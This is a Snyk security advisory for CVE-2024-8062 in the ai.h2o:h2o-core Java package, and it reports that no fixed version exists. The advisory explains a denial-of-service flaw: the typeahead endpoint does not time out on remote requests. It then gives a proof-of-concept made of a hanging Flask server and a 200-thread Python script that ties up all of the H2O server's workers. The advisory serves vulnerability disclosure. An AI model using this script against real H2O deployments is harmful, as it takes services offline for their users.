Synchronous Access of Remote Resource without Timeout Affecting ai.h2o:h2o-core package, versions [0,]
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JAVA-AIH2O-9486738
- published21 Mar 2025
- disclosed20 Mar 2025
- creditpatrik-ha
Introduced: 20 Mar 2025
NewCVE-2024-8062 (opens in a new tab)How to fix?
There is no fixed version for ai.h2o:h2o-core.
Overview
Affected versions of this package are vulnerable to Synchronous Access of Remote Resource without Timeout via the typeahead endpoint due to lacking timeout when checking that a specified resource exists. An attacker can cause the application to block and become unresponsive to other requests by sending multiple requests to an attacker-controlled server that hangs.
PoC
Run the h2o-app using java -jar h2o.jar;
Run the following Flask server:
from flask import Flask import timeapp = Flask(name)
@app.route("/", defaults={"path": ""}) @app.route("/<path:path>", methods=["GET", "POST"]) def catch_all(path): if "slow" in path: time.sleep(10000) return "OK", 200
if name == 'main': app.run()
- Run the following Python script:
import threading import requestsH2O_ADDRESS = "x.x.x.x" FLASK_ADDRESS = "x.x.x.x"
def send_req(): s = "http://{}:54321/3/Typeahead/files?src=http://{}:5000/slow&limit=-1".format(H2O_ADDRESS, FLASK_ADDRESS) requests.get(s)
Not completely sure how many are necessary.
It seems like there just needs to be enough for it to exhaust all workers/threads.
for x in range(200): threading.Thread(target=send_req).start()
- Observe that all endpoints (and the frontend-files served by the server) become unresponsive.